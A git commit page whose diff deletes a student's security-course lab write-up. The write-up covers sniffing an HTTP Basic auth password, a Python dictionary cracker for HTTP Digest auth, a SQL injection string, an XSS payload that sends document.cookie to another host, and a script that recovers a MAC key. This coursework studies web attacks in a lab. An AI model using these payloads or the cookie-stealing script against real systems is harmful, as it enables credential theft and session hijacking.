diff options
| author | Matt Strapp <matt@mattstrapp.net> | 2022-01-11 10:18:56 -0600 |
|---|---|---|
| committer | Matt Strapp <matt@mattstrapp.net> | 2022-01-11 10:18:56 -0600 |
| commit | 6c9b79537f03115c5e2d4883fd407a6ac870bffd (patch) | |
| tree | a26cecd37bb254795e8a847ca7235d5e7236ff54 /csci5271/ho2/writeup.md | |
| parent | finish 3606 (diff) | |
| download | homework-6c9b79537f03115c5e2d4883fd407a6ac870bffd.tar homework-6c9b79537f03115c5e2d4883fd407a6ac870bffd.tar.gz homework-6c9b79537f03115c5e2d4883fd407a6ac870bffd.tar.bz2 homework-6c9b79537f03115c5e2d4883fd407a6ac870bffd.tar.lz homework-6c9b79537f03115c5e2d4883fd407a6ac870bffd.tar.xz homework-6c9b79537f03115c5e2d4883fd407a6ac870bffd.tar.zst homework-6c9b79537f03115c5e2d4883fd407a6ac870bffd.zip | |
Resume and rearrange
Signed-off-by: Matt Strapp <matt@mattstrapp.net>
Diffstat (limited to 'csci5271/ho2/writeup.md')
| -rw-r--r-- | csci5271/ho2/writeup.md | 139 |
1 files changed, 0 insertions, 139 deletions
diff --git a/csci5271/ho2/writeup.md b/csci5271/ho2/writeup.md deleted file mode 100644 index ea63dd3..0000000 --- a/csci5271/ho2/writeup.md +++ /dev/null @@ -1,139 +0,0 @@ -# 1 - -## Packet - -``` -IP 192.168.14.3.46826 > 192.168.14.1.80: Flags [P.], seq 1:143, ack 1, win 502, options [nop,nop,TS val 1452909150 ecr 2428281190], length 142: HTTP: GET /secret/file HTTP/1.1 -E.....@.@..............P.Tw.|..j........... -V..^...fGET /secret/file HTTP/1.1 -Host: 192.168.14.1 -Authorization: Basic dHJhdmlzMTQ6bWFpdkRlY2d1cjIyMDI= -User-Agent: curl/7.58.0 -Accept: */* -``` - -## User/Pass -`travis14:maivDecgur2202` - -## Contents - -```html -I'm going to let you in on a little secret. Every day, once a day, give yourself a present. Don’t plan it; don’t wait for it; just let it happen. -- Dale Cooper -``` - -# 2 -## Packet - -``` -182203 IP 192.168.14.2.36586 > 192.168.14.1.80: Flags [P.], seq 91:464, ack 308, win 501, options [nop,nop,TS val 422351445 ecr 1957960104], length 373: HTTP: HEAD /secret/cheese HTTP/1.1 -E.....@.@..v...........P,.................. -.,.Ut...HEAD /secret/cheese HTTP/1.1 -Host: 192.168.14.1 -Authorization: Digest username="travis14", realm="Cheese", nonce="/DPYEFbSBQA=c06893026441a70acf049b49540e97acd2bdd640", uri="/secret/cheese", cnonce="ZjdlNTk0ZGZmMDQwZTU3OTM2MTIxOGEyNzljNDJlYzc=", nc=00000001, qop=auth, response="872aafc461761e417d2df47b85e43d2b", algorithm="MD5" -User-Agent: curl/7.58.0 -Accept: */* -``` - -## Crack - -```python -# HTTP Digest Authentication cracker -import hashlib - -username = "travis14" -realm = "Cheese" -nonce = "/DPYEFbSBQA=c06893026441a70acf049b49540e97acd2bdd640" -uri = "/secret/cheese" -qop = "auth" -nc = "00000001" -cnonce = "ZjdlNTk0ZGZmMDQwZTU3OTM2MTIxOGEyNzljNDJlYzc=" -response = "872aafc461761e417d2df47b85e43d2b" - -# Calculate the response -with open("10k-most-common.txt") as f: - for line in f: - line = line.strip('\n').strip() - ha1 = hashlib.md5((username + ":" + realm + ":" + line).encode('utf-8')).hexdigest() - ha2 = hashlib.md5(("HEAD" + ":" + uri).encode('utf-8')).hexdigest() - response = hashlib.md5((ha1 + ":" + nonce + ":" + nc + ":" + cnonce + ":" + qop + ":" + ha2).encode('utf-8')).hexdigest() - # print(line + ":" + response) - if (response == "872aafc461761e417d2df47b85e43d2b"): - print("Password: " + line) - break - -``` -## Password - -`Password: domain` - -## Contents - -``` -Intelligence alone is not nearly enough when it comes to acting wisely. - -— Fyodor Dostoevsky -``` - -# 3 - -## Cookie - -`Stephen2019-11-03T12%3A44%3A21Z` - -# 4 - -The secret to figuring out the SQL injection was ~~trying everything~~ tuning the query to stop returning Error 500. - -## Request - -`picture=char-kway-teow.jpg'+OR+1=1+AND'user=alice--` - -## Response - -`The best char kway teow is Penang char kway teow (lat: 5.411135 / lng: 100.330462)` - -# 5 - - -## XSS - -```html -<script>document.location="http://192.168.14.3:8080/?cookie="+document.cookie;</script> -``` - -## Cookie -`GET /?cookie=auth=Iwillseeyouagainin32years. HTTP/1.1" 200 -` - -## Writeup -The main additional thing I did was start up a `SimpleHTTPServer` on port 8080 of the server I have SSH access to. The attack works because the server is making an HTTP request to that port with the cookie being that of the browser. - -# 6 -## Code -```python -import requests -from requests.packages.urllib3.exceptions import InsecureRequestWarning -import string - -requests.packages.urllib3.disable_warnings(InsecureRequestWarning) - -actual = "" -key = "Z"*19 -for n in range(19, -1, -1): - res2 = requests.get("https://192.168.14.1/mac-cookie?username="+key, - verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0] - for c in string.printable: - test = key[:n] + c - res1 = requests.get("https://192.168.14.1/mac-cookie?username="+test, - verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0] - #print(test, res1, res2) - if res1 == res2: - actual = c + actual - break - key = key[:-1] - -print("Key is", actual) -``` - -## Key -`###################k` |